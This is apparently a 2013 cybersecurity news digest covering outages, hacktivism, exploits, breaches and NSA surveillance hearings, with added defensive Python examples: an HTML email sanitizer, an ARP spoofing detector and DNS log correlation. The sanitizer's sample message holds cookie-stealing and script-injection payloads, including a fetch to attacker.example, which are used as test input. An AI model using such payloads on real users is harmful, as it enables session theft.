Daily briefing.

Sudan's Internet is back up. Hacktivists with Palestinian sympathies threaten to attack Israeli networks over the weekend, and an Iranian hacker for some reason defaces the website of New York University's Asian/Pacific/American Institute.

Icefog's "mercenaries" prompt concern about more smash-and-grab APTs.

Mailbox runs JavaScript from emails on iPads and iPhones, but many disagree with researcher Spagnuolo's identification of this as a flaw.

As September's IE zero-day continues to be exploited, Kaspersky reports this obvious-but-important fact: vulnerabilities left unpatched will not be left unattacked.

Trojans remain more prevalent than other forms of malware.

Last month's big DDoS attack on China's DNS may have been the inadvertent work of a guy from Qingdao.

CAPTCHA-solving tools are noticed on the black market, and security researchers realize the commodity's been there for four years.

SSNDOB's infiltration of data brokers shakes knowledge-based authentication, which is quickly achieving a password-like obsolescence (as it retains a similar faute-de-mieux utility). This and other episodes also prompt a hard look at breach disclosure (Silent Circle, for one, claims most big organizations are seriously remiss here) and threat information sharing (most enterprises would like it, but few see any obvious way of doing it).

The US Senate questioned Intelligence Community leaders yesterday, and testimony by Messrs. Clapper, Alexander, and Cole is linked below. Legislation overhauling surveillance is under development, and however the final outcome for intelligence turns out, it's unlikely to restore the status quo ante.

Some Australian experts say hacking back is legal down under (but caveat lector, Oz.)

Notes.

Today's issue includes events affecting Australia, China, France, Germany, Iran, Israel, New Zealand, Sudan, Sweden, United Kingdom, United States.

Cyber Attacks, Threats, and Vulnerabilities

Sudan's Internet Back Up After A Day In The Dark (TechCrunch) The Republic of Sudan was digitally cut off from the world today, amid anti-government protests. The government likely cut the cord to stem outrage over the termination of fuel subsidies, though it has yet to issue an official statement on the matter. "There are 4 physical routes from Sudan to the rest of the world. So, it is unlikely that all four cables were cut. Instead it is likely that

"Resistance Hackers" threaten cyber-attack against Israel on Saturday (Ahlul Bayt News Agency) A group of resistance hackers in the Gaza Strip has threatened to launch a cyber attack against Israeli websites on the 13th anniversary of al-Aqsa Intifada (the second Palestinian uprising) next Saturday

Website of Asian/Pacific/American Institute at NYU Hacked and Defaced (Softpedia) An Iranian hacker who uses the online moniker "le4derofh4ck" (Leader of Hack) has breached the systems of New York University. As a result of the breach, he has managed to deface the official site of the Asian/Pacific/American Institute at New York University

Rise Of The 'Hit-And-Run' APT (Dark Reading) A new model of cyberespionage is emerging that relies on cybermercenaries hired to break in, steal specific targeted information, and then leave. Yet another cyberespionage gang out of Asia has been discovered working on a for-hire basis, as advanced persistent threat (APT)-type attackers shift gears toward a more focused, stealthy, "smash-and-grab" strategy using contracted hackers

Stealthy New Click-Fraud Malware Related to Tor Botnet (Threatpost) A malware family, likely developed by the same authors who built a massive botnet recently discovered on the Tor network, has been revived with a stealthy new click-fraud scam

"Mailbox" app on iPads and iPhones runs JavaScript from emails — vulnerability or feature? (Naked Security) Italian computer scientist Michele Spagnuolo recently wrote about what he considered a security issue in the popular iPhone and iPad email app "Mailbox." Not everyone agreed with him

Mailbox tries (and fails) to fix JavaScript security hole (Graham Cluley) The researcher who rang alarm bells about a serious JavaScript security hole in the popular Mailbox iPhone app says that there is still a problem, even though the company itself believes it has resolved the issue
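What the two Mailbox items above turn on is whether a mail client renders HTML mail as active content, and why a first fix can fail. The following is an added example, not Mailbox's code and not Spagnuolo's proof of concept: an allowlist sanitizer built on Python's html.parser, placed next to the kind of blacklist-only fix that removes <script> elements and nothing else. The tag and attribute allowlists, the URL-scheme rule and the sample message are assumptions made for this illustration.

```python
"""Allowlist-based HTML e-mail sanitizer (added example, not Mailbox's code).

The allowlists, the URL-scheme rule and SAMPLE_MAIL are assumptions made for
illustration.
"""
import re
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "a", "ul", "ol", "li", "img"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}}
VOID_TAGS = {"br", "img"}
SAFE_URL = re.compile(r"^(https?:|mailto:|cid:)", re.IGNORECASE)

# Constructed message: benign markup plus three ways of smuggling script.
SAMPLE_MAIL = (
    "<p>Hi <b>there</b></p>"
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
    '<img src="x" onerror="alert(1)">'
    '<a href="javascript:alert(2)">click</a>'
    '<a href="https://example.com/">ok</a>'
)


def naive_strip_scripts(html):
    """Blacklist fix: drop <script> elements and leave everything else alone."""
    return re.sub(r"<script\b.*?</script\s*>", "", html, flags=re.I | re.S)


class Sanitizer(HTMLParser):
    """Re-serialise only allowlisted tags and attributes; drop everything else."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip = 0  # >0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip += 1
            return
        if self.skip or tag not in ALLOWED_TAGS:
            return  # unknown tag: its text is kept, the tag itself is not
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # removes on* handlers, style, srcdoc, ...
            value = (value or "").strip()
            if name in ("href", "src") and not SAFE_URL.match(value):
                continue  # removes javascript:, data:, vbscript: and relative URLs
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip = max(0, self.skip - 1)
            return
        if self.skip or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data, quote=False))


def sanitize(html):
    """Return a serialisation containing only allowlisted markup."""
    parser = Sanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    print("blacklist:", naive_strip_scripts(SAMPLE_MAIL))
    print("allowlist:", sanitize(SAMPLE_MAIL))
```

The naive function makes the point Cluley's piece reports: stripping <script> leaves event-handler attributes and javascript: URLs in place, and a browser engine will still run them. The allowlist version re-emits only markup it recognises and fails closed on everything else, which is the property to look for when judging whether a fix of this kind is complete.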

IE zero-day actively being exploited in the wild: Rapid7 (ZDNet) Criminals are actively abusing the zero-day vulnerability found in Internet Explorer, with exploit code now being found in the wild. Businesses running Internet Explorer should consider taking better precautions now that code to exploit the recently disclosed zero-day vulnerability in the browser is making the rounds. According to Rapid7 senior engineering manager Ross Barrett, exploit code is now being widely distributed on the web. He said that earlier this week he saw exploit code submitted to VirusTotal and Scumware

Attackers can slip malicious code into many Android apps via open Wi-Fi (Ars Technica) Connection hijacking could put users at risk of data theft, SMS abuse, and more. A vulnerability affecting older versions of Google's Android operating system may make it possible for attackers to execute malicious code on end-user smartphones that use a wide variety of apps, researchers said

Cyber criminals continue to exploit known vulnerabilities: Kaspersky (ARN) Cyber criminals still make extensive use of known vulnerabilities, even as zero-day attacks continue to rise

Report: 8 Out of 10 Users Infected With A Trojan (Dark Reading) Trojans are king: They now account for more than three-quarters of all new malware created and 80 percent of all malware infections, according to new data published this week. Some 77 percent of all new malware is a Trojan, while worms make up 11.3 percent, and viruses, 10.3 percent, of new malware, PandaLabs found in its second quarter 2013 threat report. The story is much the same for malware infections, with 79.7 percent due to Trojans, 6.7 percent due to viruses, and 6.1 percent due to worms

Amateur hacker behind DDoS attack on China? (Help Net Security) When, in late August, China's Domain Name Service was targeted by a huge DDoS attack which ultimately led to many websites being completely inaccessible for a period of time, the questions everybody wanted answered were: who did it, and why? According to the latest information made public by Wang Minghua, an operator with the National Computer Network Emergency Response Coordination Centre of China (CNCERT/CC), the attack seems to have been the work of a single amateur hacker from Qingdao in Shandong province

Hack of major data brokers weakens bank authentication (CSO) LexisNexis, Dun & Bradstreet and Kroll Background America hacks raise more doubt on the effectiveness of knowledge-based authentication. The reported hack of major consumer and business data aggregators has intensified doubts of the reliability of knowledge-based authentication widely used in the financial services industry, analysts say

DIY commercial CAPTCHA-solving automatic email account registration tool available on the underground market since 2008 (Webroot Threat Blog) With low-wage employees of unethical 'data entry' companies having already set the foundations for an efficient and systematic abuse of all the major Web properties, it shouldn't be surprising that new market segments quickly emerged to capitalize on the business opportunities offered by the (commercialized) demise of CAPTCHA as an additional human/bot differentiation technique. One of these market segments supplies automatic (email) account registration services to cybercriminals, who either abuse the accounts as WHOIS contact points for their malicious or fraudulent domains, or directly embed the automatically registered account data in their Web-based account spamming tools

Silent Circle claims major companies not declaring data breaches (Guardian) The company which shut its secure email over privacy concerns says corporate customers have admitted regular data breaches

Unanswered questions after the KVM hacks against Santander and Barclays bank (Graham Cluley) Neira Jones is a well-known name in the world of payment security and risk management, making her the ideal person to ask some difficult questions of banks targeted in the recent KVM (keyboard, video, mouse) attacks. The last few weeks have seen headlines in the UK press about cybercriminal gangs targeting the likes of Santander and Barclays bank, using social engineering techniques to install KVM (keyboard, video and mouse) devices to spy on staff computers and steal money

Major NZ retail chain hit by phishing attack (New Zealand Herald) NetSafe is warning businesses to be on the alert after a major retail chain was targeted by overseas cyber criminals in a well-planned phishing attack that attempted to convince store staff to install rogue software on their computers

Unique Vintage Admits Security Breach (eSecurity Planet) Customers' names, e-mail addresses, phone numbers and credit card numbers were accessed

Cybercriminals exploit most news within 22 hours (Help Net Security) Cybercriminals continue to respond with lightning speed when they see an opportunity to exploit a national or global news story to spread malware. In fact criminals are inventing "breaking news" that appears to relate to high-profile current events

The Coming Risk of Scam "Obamacare" Sites (Trend Micro Simply Security) In the United States on October 1, 2013 a major provision of the Affordable Care Act (also popularly known as "Obamacare") goes into effect. The Health Insurance Exchange will go live. These sites are where people will be able to sign up for health care coverage themselves rather than through their employer. One way people will be able to sign up for coverage after October 1 is online. But because of the way this online registration will work and the type of information people will have to enter to get health care coverage, there's a real risk of a perfect storm that can make this process a bonanza for identity thieves and cybercriminals. This could be the most significant new area for phishing and identity theft in the next year in the United States. It also can give established healthcare scammers a new field to look for victims

Dictatorship 101: Don't Shut Off the Internet for a Day (Slate) The Internet monitoring firm Renesys reports that Sudan's Internet is back up after a 24-hour complete blackout…According to the firm's analysis, the fact that different service providers in the country came down at different times "implies that this event was not caused by a single catastrophic technical failure, but strongly suggests a coordinated action to remove Sudan from the Internet." Add to that, the fact that the outage occurred during the country's worst protests in about two years, in which at least 24 have been killed

ARP Spoofing And Lateral Movement (TrendLabs Security Intelligence Blog) In targeted attacks, during the lateral movement stage attackers try to gain access to other computers on the same local area network (LAN). One useful tool to achieve this is ARP spoofing, which can be used to carry out a variety of attacks to steal information as well as plant backdoors on other machines. We recently came across a tool that automates ARP attacks, as well as using these kinds of attacks to inject IFRAMEs into websites, deliver fake software updates, and disrupt SSL connections
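The attacks the TrendLabs item describes all rest on one primitive, a host answering ARP for an address that is not its own (typically the gateway's). What a defender can watch for follows from that. The example below is added here and is not Trend Micro's tool or analysis: it runs three checks over a feed of ARP replies, an IP announced from more than one MAC, the gateway's MAC changing, and a burst of re-announcements for one IP. The reply tuples, the gateway address and the thresholds are constructed for the illustration.

```python
"""ARP spoofing detection over a stream of ARP replies.

Added example, not the tool described by Trend Micro. The reply tuples, the
gateway address and the thresholds are constructed for illustration.
"""
from collections import defaultdict

# Constructed sample: (seconds, sender IP, sender MAC) from ARP "is-at" replies
# seen on one segment. 10.0.0.1 is the default gateway.
ARP_REPLIES = [
    (0.0, "10.0.0.1", "00:11:22:33:44:01"),
    (1.0, "10.0.0.5", "00:11:22:33:44:05"),
    (2.0, "10.0.0.7", "00:11:22:33:44:07"),
    (3.0, "10.0.0.1", "00:11:22:33:44:01"),
    # from here the host at ...:07 claims the gateway's IP, repeatedly
    (4.0, "10.0.0.1", "00:11:22:33:44:07"),
    (4.5, "10.0.0.1", "00:11:22:33:44:07"),
    (4.6, "10.0.0.1", "00:11:22:33:44:07"),
    (4.7, "10.0.0.1", "00:11:22:33:44:07"),
    (4.8, "10.0.0.1", "00:11:22:33:44:07"),
    (5.0, "10.0.0.5", "00:11:22:33:44:05"),
]


def analyze_arp(replies, gateway_ip, burst_window=2.0, burst_threshold=4):
    """Run three checks over (ts, ip, mac) replies and return the findings.

    conflicts:       IPs announced from more than one MAC
    changes:         every IP->MAC change, as (ts, ip, old_mac, new_mac)
    gateway_changes: the subset of changes affecting the gateway (MITM signal)
    bursts:          IPs re-announced >= burst_threshold times inside
                     burst_window seconds (poisoners re-send to keep caches
                     overwritten); reported once per IP
    The thresholds are assumptions; tune them to the segment being watched.
    """
    last_mac = {}
    macs_per_ip = defaultdict(set)
    window = defaultdict(list)
    changes, bursts, burst_seen = [], [], set()
    for ts, ip, mac in replies:
        mac = mac.lower()
        macs_per_ip[ip].add(mac)
        old = last_mac.get(ip)
        if old is not None and old != mac:
            changes.append((ts, ip, old, mac))
        last_mac[ip] = mac
        recent = window[ip]
        recent.append(ts)
        while recent and ts - recent[0] > burst_window:
            recent.pop(0)
        if len(recent) >= burst_threshold and ip not in burst_seen:
            bursts.append((ts, ip, len(recent)))
            burst_seen.add(ip)
    return {
        "conflicts": {ip: sorted(m) for ip, m in macs_per_ip.items() if len(m) > 1},
        "changes": changes,
        "gateway_changes": [c for c in changes if c[1] == gateway_ip],
        "bursts": bursts,
    }


if __name__ == "__main__":
    for kind, items in analyze_arp(ARP_REPLIES, "10.0.0.1").items():
        print(kind, items)
```

On the sample feed the gateway check and the conflict check fire on the same event, which is the usual shape of a gateway-impersonation attempt; the burst check catches the continuous re-poisoning that tools of this kind rely on. Static ARP entries for the gateway on sensitive hosts and Dynamic ARP Inspection on managed switches remove the primitive rather than merely observing it.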

Security Patches, Mitigations, and Software Updates

Apple releases iOS 7.0.2 — swiftly squashing two lockscreen bugs (Naked Security) Apple has quickly fixed two lockscreen bugs that it introduced with iOS 7. Well done, Cupertino! (To all hardcore Apple fans reading this: that's not irony. I really mean it.)

Apple releases iOS 7.0.2, fixing lockscreen passcode flaw (Graham Cluley) Apple has just released a new version of iOS for iPhone and iPad users, which it says will fix the various passcode flaws that have been embarrassing the company since the recent launch of iOS 7

Tumblr Fixes DOM XSS Bug (Industrial Safety and Security Source) There was a DOM-based cross-site scripting (XSS) vulnerability in Tumblr, a researcher found. If left unfixed, the issue could have been exploited for spamming, spreading malware and phishing, said Portuguese security researcher David Sopas

Cyber Trends

Time for a Change in Security Thinking (Threatpost) Security, like a lot of other things, tends to go in phases. A new attack technique is developed, vendors respond with a new defensive technology and then attackers find a way to defeat it. It has always been that way. And right now, things seem to be in one of those periodic down cycles in which the attackers have the upper hand

Challenges faced by top CSOs (Help Net Security) (ISC)² released new data that outlines the chief challenges faced by top enterprise security executives and illustrates the broad range of complex — and sometimes conflicting — challenges faced by today's enterprise information security leaders

Security Staff Feel Largely Unprepared for Cyber–Espionage and APTs (InfoSecurity Magazine) Advanced persistent threats (APTs) are insidious, multi-pronged and stealthy — and aimed at siphoning off an organization's intellectual property. But when it comes to protecting those crown jewels, the thieves seem to be staying one step ahead of security departments

Industry leaders perceive numerous security threats to their data (Help Net Security) An overwhelming majority of business leaders believe their customers and clients worry about breaches of personal data held by their organizations. Unisys-sponsored research conducted by IDG Connect found that 91% of business decision makers surveyed were concerned about their customers' perceptions of their organization's ability to protect personal data, with 65% of decision makers reporting they believe customers are "very concerned"

Organizations fear their privacy activities are insufficient (Help Net Security) The perceived level of maturity attached to organizations' privacy activities has decreased since 2011, as many organizations deem their existing privacy activities to be inadequate, according to a survey by Gartner. The survey found that 43 percent of organizations have a comprehensive privacy management program in place, while 7 percent admitted to "doing the bare minimum" regarding privacy laws

Organizations are flying blind as they embrace cloud services (Help Net Security) Organizations lack the information to understand and mitigate a broader set of risks posed by the use of cloud services, according to Skyhigh Networks. "What we are seeing from this report is that there are no consistent policies in place to manage the security, compliance, governance, and legal risks of cloud services," said Rajiv Gupta, founder and CEO at Skyhigh Networks. "Our cloud usage analytics suggest that enterprises are taking action on the popular cloud services they know of and not on the cloud services that pose the greatest risk to their organization. Lack of visibility into the use and risk seem to be crux of the problem"

In 2020, Cyberthreats Get Physical and the Internet of Things Opens Gaping Security Holes (Infosecurity Magazine) From cloud-powered denial-of-service attacks and Big Data vulnerabilities to bio-hacks that defeat authentication systems like fingerprint recognition, we are on the cusp of a brave new world of cyber-attack exploits, Europol warns

Most CIOs grossly underestimate how many cloud apps their employees use (CITEWorld) Skyhigh Networks, the company that monitors the use of cloud services for businesses, released its first trend report about its customers. If you doubted how popular cloud services have become, this should be a real eye opener. The report shows the incredible growth of cloud services in businesses and just how clueless IT departments are about what employees are doing in the cloud

Chief Security Officers Get Down to Business (eSecurity Planet) These days the role of the chief information security officer (CISO) is less about technology and more about managing business risk. As organizations see IT security within the larger context of risk management, so too is the role of the CISO taking on greater significance. Fewer and fewer CISOs have technical backgrounds, and many are moving to a more proactive footing where they seek to influence corporate strategy

39% of big data developers say government agencies are spying on our data (Venture Beat) Two out of five software engineers working on big data solutions say that government agencies are tracking the data they're collecting, creating, and analyzing. And if you only ask those who are confident they could tell if the government was indeed spying on their data, that number goes up to 59 percent. Which suggests they know — not just think — that governments are spying

Users want a seamless experience in public Wi-Fi (Help Net Security) With smartphone and tablet usage continuing to explode, operator-deployed Wi-Fi networks are playing an increasing role in keeping users connected on the go. A new study conducted in Europe on behalf of Wi-Fi Alliance indicates that advanced features such as seamless authentication, on-site enrollment of additional devices, and Wi-Fi roaming present operators with compelling opportunities to drive business value

Marketplace

Future Air Force Contracts Likely Will Include Firm Price Caps (National Defense) The Air Force is considering placing price caps on major procurement programs that, when reached, will force Pentagon buyers to rethink requirements and make tradeoffs in favor of affordability, a senior civilian with the service said Sept. 26. Richard W. Lombardi, deputy assistant secretary for acquisition integration with the office of the assistant secretary of the Air Force for acquisition, said defense officials are giving more weight to long-term affordability as they lay out a series of spending plans that will be published in coming months…Another top priority is developing a viable strategy for acquisition of cyber-related systems and weapons, Lombardi said. The cyber realm, which is under Air Force auspices, develops at such a high speed that the Pentagon's acquisition apparatus cannot keep pace, he said

Microsoft, Facebook and Mozilla hunt for developers at HackWEEKDAY (Help Net Security) This October, developers from around the globe have an opportunity to showcase their coding skills to an international audience at the HackWEEKDAY hackathon in Kuala Lumpur

Education and skills key to cyber security, says (ISC)² (ComputerWeekly) Information security professionals are making progress, but they are still losing the race against adversaries, according to Hord Tipton, executive director of security professional certification body (ISC)². But one of the biggest challenges is the lack of skilled people to help mitigate the security risks as businesses move into mobile and cloud computing

MITRE to Run Natl Security Engineering Center for $626M (GovConWire) MITRE Corp. has received a $626.2 million contract from the U.S. Army to help manage a federally funded research and development center focused on national defense and intelligence strategies

National Governors Association directs members to DHS continuous monitoring BPA (FierceGovIT) State governments can make use of the Homeland Security Department's continuous monitoring blanket purchase agreement and may want to do so in conjunction with managed security services available through the DHS-recognized Multi-State Information Sharing and Analysis Center, says a paper from the National Governors Association

Can China Protect Itself From NSA Spying? (Atlantic) Following Edward Snowden's revelations, Beijing has kickstarted its domestic cyber-security industry. But there's still a long way to go

Products, Services, and Solutions

Google Returns to Larry and Sergey's Garage for Massive Search Revamp (Wired) If you've started to feel like Google understands you a little better, the company says that's because they've quietly rolled out the biggest revamp of search in years

Multifactor authentication available on Windows Azure (InfoWorld) Microsoft is pricing the service at $2 per month per user for unlimited authentications

Watchful Software updates its information protection solution (Help Net Security) Watchful Software released RightsWATCH 5.0, which extends the secure flow of information throughout an organization while automatically applying corporate security policies without users having to make decisions or do extra work. This ensures that classified information can be used by valid users anywhere even if they are outside of the secure network perimeter and using BYOD devices

Amazon.com released Fire OS 3.0 "Mojito" (Help Net Security) Amazon.com introduced Fire OS 3.0 "Mojito," the next generation of software and services that powers Kindle Fire tablets, with hundreds of updates and new features to give customers an OS experience with Android app compatibility

Deploy endpoint encryption technologies with Wave Cloud 2014 (Help Net Security) Wave Systems launched Wave Cloud 2014, a cloud-based service for enterprise-wide management of endpoint encryption. It includes management of Windows BitLocker and Mac FileVault in addition to self-encrypting drives (SEDs), enabling the service to handle the complete spectrum of embedded endpoint encryption technologies

CORE Impact Pro 2013 R2 gets enhanced web services capabilities (Help Net Security) CORE Security released CORE Impact Pro 2013 R2, which allows organizations to proactively test IT infrastructure and identify exactly where and how an organization's critical data can be breached

Technologies, Techniques, and Standards

Establishing The New Normal After A Breach (Dark Reading) Breach response shouldn't just be about notifications and systems clean-up: organizations can use their mistakes as learning aids to change processes and policies for lasting security success. As embarrassing and costly as a big data breach may be for an organization, many security professionals will tell you that this kind of incident may be good news in the long run for the risk posture of the business. Sometimes even after numerous warnings from security and risk advisors, the only way for senior managers to sit up and pay attention to a set of risks is to have an incident from that risk detailed blow by blow in the business press

The Ripple Effect: Containing Cryptolocker (Umbrella Security Labs) In the past, we have demonstrated use cases of massive data-driven algorithmic malware and botnet detections, given our unique visibility to the global DNS traffic. When dealing with cases of few infections and thus mostly low traffic volume (but not necessarily less impact!), making correlations and revealing patterns with little contextual information becomes both tricky and critical. Using the recent revival of the ransomware Cryptolocker, which victimized a few OpenDNS customers, we present a case study of a method that we call the Ripple Effect
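The Umbrella post names its correlation method but the excerpt above does not describe it, so the following is an added, generic example rather than OpenDNS's implementation: given resolver logs and one domain already known to belong to an infection, find the other domains that the same clients look up around the same time, and discount any domain that the rest of the client population also queries. The log lines and every domain name in it are constructed, and SEED stands in for a hypothetical known-bad name.

```python
"""Co-occurrence over DNS query logs to find domains that travel with a
known-bad one (added example; a generic approach, not OpenDNS's method).
Log lines and domain names are constructed; SEED is a hypothetical C2 name.
"""
from collections import defaultdict

# Constructed resolver log: "<seconds> <client> <queried name>"
DNS_LOG = """\
100 10.1.1.10 www.example.com
101 10.1.1.10 qrtlxwebyd.net
102 10.1.1.10 kvxlpzmaa.org
103 10.1.1.11 www.example.com
104 10.1.1.11 mail.example.net
105 10.1.1.12 qrtlxwebyd.net
106 10.1.1.12 kvxlpzmaa.org
107 10.1.1.12 www.example.com
108 10.1.1.13 www.example.com
109 10.1.1.13 mail.example.net
200 10.1.1.12 bnwhrqpcm.com
201 10.1.1.10 bnwhrqpcm.com
"""
SEED = "qrtlxwebyd.net"  # hypothetical known-bad domain seen from an infected host


def parse_log(text):
    """Parse the constructed log format into (ts, client, name) rows."""
    rows = []
    for line in text.splitlines():
        if line.strip():
            ts, client, name = line.split()
            rows.append((float(ts), client, name.lower().rstrip(".")))
    return rows


def ripple(rows, seed, window=60.0, min_ratio=0.8, min_seed_clients=2):
    """Score every domain by how many seed-querying clients also queried it
    within `window` seconds of a seed lookup, divided by the domain's total
    client population. Returns (all scores, ranked candidate names)."""
    by_client = defaultdict(list)
    clients_per_domain = defaultdict(set)
    for ts, client, name in rows:
        by_client[client].append((ts, name))
        clients_per_domain[name].add(client)
    co = defaultdict(set)  # domain -> seed clients that queried it nearby
    for client in clients_per_domain[seed]:
        events = by_client[client]
        seed_times = [ts for ts, name in events if name == seed]
        for ts, name in events:
            if name != seed and any(abs(ts - st) <= window for st in seed_times):
                co[name].add(client)
    scored = [
        (name, len(cs), len(clients_per_domain[name]),
         len(cs) / len(clients_per_domain[name]))
        for name, cs in co.items()
    ]
    # rank by share of the domain's clients that are seed clients, then by count
    scored.sort(key=lambda r: (-r[3], -r[1], r[0]))
    candidates = [name for name, n, total, ratio in scored
                  if ratio >= min_ratio and n >= min_seed_clients]
    return scored, candidates


if __name__ == "__main__":
    scores, found = ripple(parse_log(DNS_LOG), SEED)
    for name, n_seed, n_all, ratio in scores:
        print(f"{name:20s} seed_clients={n_seed} all_clients={n_all} ratio={ratio:.2f}")
    print("candidates:", found)
```

The denominator is what keeps a popular name such as www.example.com out of the result even though every infected client also queried it; the time window is what separates the domains fetched by the same infection from the rest of the clients' day. Both knobs are assumptions to be tuned against real volume, and on a handful of infections, as the post notes, the window and the population cut matter more than the raw counts.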

How to avoid being one of the "73%" of WordPress sites vulnerable to attack (Naked Security) Researchers have concluded that 73% of the 40,000 most popular websites that use WordPress software are vulnerable to attack. But they admit they might be wrong. Even so, they still highlight an important security issue which isn't diminished one iota by their sketchiness

Cyber Resilience: Building a Defense Strategy that Works (InfoSecurity Magazine) The ISF's Steve Durbin discusses how organizations can converge cybersecurity and risk management strategies to help deal with unknown threats in cyberspace

Threat-Intel Sharing Services Emerge, But Challenges Remain (Dark Reading) A number of services to help companies analyze threats and share intelligence have popped up, but the services have to solve some key problems. Six years ago, when Mike Hamilton, the chief information security officer for the City of Seattle, wanted to collaborate with other local municipalities, the federal government and critical-infrastructure providers to exchange threat information, no platform existed through which to share threat intelligence

When Internet trolls attack: A view from the receiving end (CNET) One well-known science site recently turned off reader comments altogether due to trolls and spambots. The host of CNET TV show Rumor Has It, who has dealt with her share of online abuse, ponders the move

Research and Development

'Viceroi' algorithm improves detection of click fraud (ComputerWorld) A group of researchers have devised an algorithm they say could help advertising networks better detect fraudulent clicks. Fraudsters have developed sophisticated ways to perpetrate click fraud, which involves using various methods to generate fake clicks on advertisements, defrauding advertisers. Digital marketing revenues are rapidly growing and exceeded US$36 billion in 2012 in the U.S., according to the Interactive Advertising Bureau

Assuring the integrity of voting using cryptography (Scientific American) American voters have no way of knowing that our votes have been counted, or counted correctly. We go to the polls and we punch buttons on a screen or fill out paper ballots and put them in a box, but we don't know if the electronic voting machine works correctly, if the ballot box made it to the election office, or if the ballots have been accurately tallied. The rise of electronic voting machines with secret, proprietary software has only made these problems worse

What Nanotube Computer Means To Moore's Law (InformationWeek) Stanford scientists have built a nanotube computer, an engineering feat that points to continuing advances in computational performance

Academia

Forget Foreign Languages and Music. Teach Our Kids to Code (Wired) J. Paul Gibson began to teach programming classes for teens out of frustration. A computer scientist at the National University of Ireland, he had by 1998 become shocked at the ineptness of his students. "I was seeing 18- and 19-year-olds having trouble with basic programming concepts that I myself had learned when I was 12," recalls Gibson, who taught himself to code on a Sinclair ZX81. "I realized they hadn't seen any programming in school at all up to that point. So I thought maybe one of the problems we were having is that they were coming to it too late." As word of Gibson's classes spread, primary schools in the Dublin area sought his services too

Carnegie Mellon's Information Networking Institute Receives Federal Funding for Cybersecurity Scholarships (Digital Journal) Seventeen Carnegie Mellon University graduate students were recently awarded scholarships in cybersecurity from the National Science Foundation, the Department of Homeland Security's CyberCorps Scholarship for Service (SFS) Program and the Department of Defense's Information Assurance Scholarship Program (IASP). The SFS awards went to nine students in CMU's Information Networking Institute (INI) and six students at CMU's Heinz College. The IASP awards went to two INI students

Legislation, Policy, and Regulation

Senators introduce reform initiative in light of aggressive NSA surveillance (SC Magazine) Extensive National Security Agency (NSA) surveillance has led four senators to introduce the Intelligence Oversight and Surveillance Act, a reform initiative designed to maintain privacy without impeding security. Senators Ron Wyden (D-Ore.), Mark Udall (D-Colo.), Richard Blumenthal (D-Conn.), and Rand Paul (R-Ky.) spoke live Wednesday about the proposal, which will amend the Foreign Intelligence Surveillance Act (FISA) and seek to improve the Foreign Intelligence Surveillance Court (FISC)

Senate pursues law to limit NSA surveillance (Fresno Bee) Chairwoman Dianne Feinstein says the Senate Intelligence Committee is drafting legislation to limit the National Security Agency's access to U.S. phone and email data in an effort to win back public trust following disclosures about widespread domestic surveillance

Remarks as delivered by James R. Clapper, Director of National Intelligence at an Open Hearing on Foreign Intelligence Surveillance Authorities (IC on the Record) Open Hearing on Foreign Intelligence Surveillance Authorities, U.S. Senate Select Committee on Intelligence. Chairman Feinstein, Vice Chairman Chambliss, and distinguished members of the Committee. Thank you for having us here today, to talk about the way ahead, occasioned by the dramatic revelations about intelligence collection programs since their unauthorized disclosure, and about the steps we're taking to make these programs more transparent, while still protecting our national security interests

Remarks as delivered by General Keith Alexander, Director of the National Security Agency (IC on the Record) Open Hearing on Foreign Intelligence Surveillance Authorities, U.S. Senate Select Committee on Intelligence. Chairman Feinstein, Vice Chairman Chambliss, distinguished members of the committee, I am privileged today to represent the work of the dedicated professionals at the National Security Agency, who employ the authorities provided by Congress, the courts and the executive branch to help defend this nation. If we are to have a serious debate about how NSA conducts its business, we need to step away from sensational headlines and focus on the facts

Remarks as delivered by Deputy Attorney General, James Cole (IC on the Record) Open Hearing on Foreign Intelligence Surveillance Authorities, U.S. Senate Select Committee on Intelligence. Thank you, Chairman Feinstein, Vice Chairman Chambliss, distinguished members of the committee, for inviting us here today to talk about NSA's 215 business records program and Section 702 of FISA. I'm going to try and be brief and just focus my opening remarks on the 215 program

NSA: Surveillance court says no upper limit on phone records collection (ComputerWorld) The agency intends to collect all US phone records and put them in a searchable database, director Keith Alexander says

U.S. officials dodge questions on scope of surveillance (Washington Post) U.S. officials declined to directly answer lawmakers' questions on Thursday about the full scope of the National Security Agency's collection of Americans' data, including whether it has ever sought to acquire large volumes of cellphone location information or other records. NSA Director Keith Alexander dodged questions by a senior member of the Senate Intelligence Committee about whether the agency has ever tried to augment its broad collection of virtually all Americans' phone-call records by gathering data that would indicate the callers' locations. He noted that intelligence officials had given a classified answer to the question

Sen. Ron Wyden: NSA 'repeatedly deceived the American people' (Guardian) About the Snowden disclosures, the Oregon Democrat told the NSA chief: 'the truth always manages to come out.' The Senate Intelligence Committee yesterday held a hearing, ostensibly to investigate various issues raised about the NSA's activities. What the hearing primarily achieved instead was to underscore what a farce the notion of Congressional oversight over the NSA is

NSA chief defends collecting Americans' data (Washington Post) The head of the National Security Agency delivered a vigorous defense Wednesday of his agency's collection of Americans' phone records for counterterrorism purposes, asserting that the program was helpful in investigations of the Boston Marathon bombing and the suspected plots against U.S. diplomatic outposts this summer

NSA Revelations Leave Encryption Experts In A Quandary (WCAI Cape and Islands NPR) The technology world is reeling. That's after press reports earlier this month that the National Security Agency may have weakened computer software. The reason: to make it easier for the government to read encrypted messages. The stories have upset many encryption experts, the very people who help scramble digital communications to keep those messages secure

'No problem' with NSA collaboration, says NIST director (FierceGovIT) National Institute of Standards and Technology Director Patrick Gallagher again defended his agency's collaboration with the National Security Agency over cybersecurity standards development

